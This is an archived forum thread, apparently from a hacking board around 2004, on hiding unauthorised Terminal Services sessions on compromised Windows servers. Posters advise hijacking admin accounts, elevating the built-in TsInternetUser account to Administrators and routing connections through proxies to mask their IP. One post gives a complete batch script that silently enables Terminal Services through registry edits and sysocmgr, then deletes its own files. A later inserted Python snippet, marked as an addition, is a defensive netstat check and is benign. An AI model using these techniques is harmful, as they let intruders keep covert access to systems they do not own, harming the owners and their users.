poldi
HI.

Do you know any way to hide a user so it won't show up in the list of currently connected clients?

THX Poldi
andydis
there was another thread on this. first off, i don't think it can be done unless you somehow disable Terminal Server Manager (i.e. sabotage the program on the server that lets them view connected clients, have a look for linked DLLs or something)

2nd off, this is a VERY BAD way to gain access to a system if it's not yours, I'm sure others will agree?
ch0pper
3nd off this is a VERY BAD way to gain access to a system if it's not yours, I'm sure others will agree?

sure, it's been done: API hooking. code not public, but it can be done
brOmstar
i have some servers which i have been able to access via TS for over a year and never had problems, so why should this be a bad way? this way rocks
andydis
fine have it your way but you will end up getting BUSTED.

the idea to have full control over a box and not let the admin know obviously doesn't appeal to you and u want to be known.
=k3Rn=
Hm i also thought about this.

Up to now i haven't used TS to control a host, also because i don't know how obvious the connection is ...

Where can the admin of the host see that you are logged on?

You've got two problems: First, you have to create a user account (best admin) - this account can be found by the admin (won't it even be visible at the next Windows login screen?)
And the second problem: when you connect using TS, then i think the admin can also see that you are connected quite easily.

Would be cool if you post some comments.

Greetz
=k3Rn=
Erra
Why create your own account, why not just grab their existing admin account?

And, why connect to it with your own IP? I mean, come on, there are ways to use other IPs when connecting.

And how many admins do you know that sit there and check out who is logged in via TS? I'm guessing not many, and if they do see you, it will be accidental, I am sure.

But it's a risk you take... but then, accessing any machine illegally is a risk you take...

just be sensible and careful
=k3Rn=
QUOTE

Why create your own account, why not just grab their existing admin account?


If the admin is logged in, i think you can't log in too using that account.

QUOTE

And, why connect to it with your own IP? I mean, come on, there are ways to use other IPs when connecting.


That is interesting, how do you want to use other IP numbers? A redirect over another host?
Please explain that.

Greetz
=k3Rn=
cranky
sockscap > *
Erra
Exactly, use sockscap...

And if the admin is logged in to the desktop, you can usually still use an RDP connection to log in unless they have set it up so that you can't.

But most admins don't do that
el33t
install socks inside the server, then connect to ts through itself by socks5, what ip will be shown in tsadmin?


127.0.0.1

LOL
seppel18
Use a Router or Switch on your PC!

Then the Terminal Service Manager on the Hacked Machine will Show your Internal IP (192.168.*.*)

(But the Admin Can still see your real IP with netstat)

Or Uninstall Terminal Services and Reinstall it with this .bat :

----------------------------------------
echo Windows Registry Editor Version 5.00> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]>> c:\TS.reg
echo "Start"=dword:00000002>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]>>C:\TS.REG
echo "EnableAdminTSRemote"=dword:00000001>>C:\TS.REG
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>C:\TS.REG
echo "TSEnabled"=dword:00000001>>C:\TS.REG
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]>>C:\TS.REG
echo "Start"=dword:00000002>>C:\TS.REG
REGEDIT /S C:\TS.REG
echo [Components] > c:\bootlog~.txt
echo TSEnabled = on >> c:\bootlog~.txt
sysocmgr /i:%windir%\inf\sysoc.inf /u:c:\bootlog~.txt /q
DEL /Q c:\TS.REG
DEL /Q c:\bootlog~.txt
-----------------------------------------

Then Terminal Services will be Enabled without the Manager
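A defender-side check for the point raised in the posts above (the session list can show a loopback or internal address while netstat still shows the actual TCP peer), given here as an added example that is not part of the original thread. The netstat sample is constructed, and the trusted range `10.0.0.0/24`, the function name and the verdict labels are assumptions.

```python
import ipaddress
import re

# Constructed `netstat -an` output for illustration (not captured from a real host).
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    10.0.0.5:3389          203.0.113.7:49812      ESTABLISHED
  TCP    127.0.0.1:3389         127.0.0.1:1045         ESTABLISHED
  TCP    127.0.0.1:1045         127.0.0.1:3389         ESTABLISHED
  TCP    10.0.0.5:3389          10.0.0.20:50211        ESTABLISHED
  TCP    10.0.0.5:445           10.0.0.20:50300        ESTABLISHED
  TCP    10.0.0.5:3389          198.51.100.9:40000     TIME_WAIT
"""

RDP_PORT = 3389  # default Terminal Services / RDP listener port
ROW = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)\s*$")


def rdp_sessions(netstat_text, trusted_nets=("10.0.0.0/24",)):
    """Classify the remote peer of every ESTABLISHED connection to local port 3389."""
    trusted = [ipaddress.ip_network(n) for n in trusted_nets]  # assumed admin range
    findings = []
    for line in netstat_text.splitlines():
        m = ROW.match(line)
        if not m:
            continue  # header, UDP rows, blank lines
        _local_ip, local_port, remote_ip, remote_port, state = m.groups()
        if int(local_port) != RDP_PORT or state != "ESTABLISHED":
            continue  # only live inbound sessions on the RDP listener
        remote_ip = remote_ip.strip("[]")  # netstat brackets IPv6 addresses
        try:
            addr = ipaddress.ip_address(remote_ip)
        except ValueError:
            continue  # unparsable address column
        if addr.is_loopback:
            verdict = "loopback-source"  # session relayed by a process on the server itself
        elif any(addr in net for net in trusted):
            verdict = "trusted"
        else:
            verdict = "untrusted-source"
        findings.append((remote_ip, int(remote_port), verdict))
    return findings


if __name__ == "__main__":
    for ip, port, verdict in rdp_sessions(SAMPLE_NETSTAT):
        print(f"{ip}:{port} -> {verdict}")
```

A `loopback-source` row means some local process is relaying the session, so the next step is to find which process owns the paired local port.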
seppel18
QUOTE (=k3Rn= @ May 4 2004, 06:04 PM)
"First you have to create a user account (best admin) - this account can be found by the admin"


I usually use the already Created and unused "TsInternetUser" Account, change password, and elevate it to Administrator Group.

QUOTE (=k3Rn= @ May 4 2004, 06:04 PM)
"(won't it even be visible at next windows login screen?)"


No... 'cause you have your own Desktop, the Admin in front of the Monitor will see nothing. That's so Great About Terminal Services (Works only with Win2K-Server and Win2k3, NOT WinXP!!)

QUOTE (=k3Rn=)
If the admin is logged in, i think you can't log in too using that account.


You Can!!
Kaaroth
cool the ts installation w/o manager ^^ thx
6066up9r
great suggestions, will certainly use them in the next admin session
Nessuno
about logging in with the same user... if 2 boxes connect to the same server via TS with the same user, i think they can see each other's desktop, or not?
i mean... like dntu mini remote ctrl (it isn't a perfect example), u interact with the other one logged in.
am i wrong?
or on TS can 10 persons log in with the same user and have 10 different desktops?
sorry for my english, if u don't understand i'll try to speak in an easier way

have a nice day, byebye
seppel18
QUOTE (Nessuno @ May 6 2004, 06:54 AM)
am i wrong?


yeah

QUOTE
or on ts u can login 10 person with the same user and have 10 different desktops?


yap!

Terminal Services have nothing to do with DWRC,VNC,RAdmin,.....
Nessuno
ok tnx for the info
i'll never stop learning
bye have a nice day
Reaper527
QUOTE (seppel18 @ May 5 2004, 07:32 AM)
Use a Router or Switch on your PC!

Then the Terminal Service Manager on the Hacked Machine will Show your Internal IP (192.168.*.*)

no, your internal IP is called that because it's only seen internally on your network. any traffic to the internet goes through your router, which gets it for you (so your router's IP, aka your external IP) would be the one seen. if you don't believe me, sit behind your router and go to a whatsmyip.com type of site. the IP you see won't begin with 192.168

great work on that bat though, that should be useful
jimmy
it can be done as well with windows XP btw ...
just a registry change